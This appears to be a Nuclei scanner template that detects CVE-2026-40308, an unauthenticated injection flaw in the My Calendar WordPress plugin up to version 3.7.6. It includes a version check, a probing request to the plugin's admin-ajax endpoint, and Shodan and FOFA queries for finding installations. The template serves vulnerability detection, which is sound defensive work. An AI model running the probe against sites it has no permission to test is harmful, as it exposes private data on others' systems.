id: CVE-2026-40308 info: name: My Calendar WordPress Plugin - Information Disclosure author: theamanrawat severity: high description: | My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup. impact: | Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations. remediation: | Update to version 3.7.7 or later. reference: - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch - https://nvd.nist.gov/vuln/detail/CVE-2026-40308 classification: cve-id: CVE-2026-40308 epss-score: 0.02306 epss-percentile: 0.85039 cwe-id: CWE-639 metadata: verified: true max-request: 2 vendor: joedolson product: my-calendar framework: wordpress shodan-query: http.html:"/wp-content/plugins/my-calendar/" fofa-query: body="/wp-content/plugins/my-calendar/" && title="WordPress" tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt" matchers-condition: and matchers: - type: word words: - "My Calendar" - "Stable tag:" condition: and internal: true extractors: - type: regex name: version part: body group: 1 regex: - '(?m)Stable tag:\s*([0-9.]+)' internal: true - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1" matchers-condition: and matchers: - type: dsl dsl: - 'compare_versions(version, "<= 3.7.6")' - 'contains_all(body, "\"success\":1", "response")' - 'status_code == 200' condition: and # digest: 4a0a00473045022008ed3bbdbc2ef43d85d88bb10f072463a4b6437a5bd46a9d55d7f171443687a50221009e057bea0c1859255ada0bd1fb2bc7eb4fe3846ce324583692448e194efd5550:922c64590222798bb761d5b6d8e72950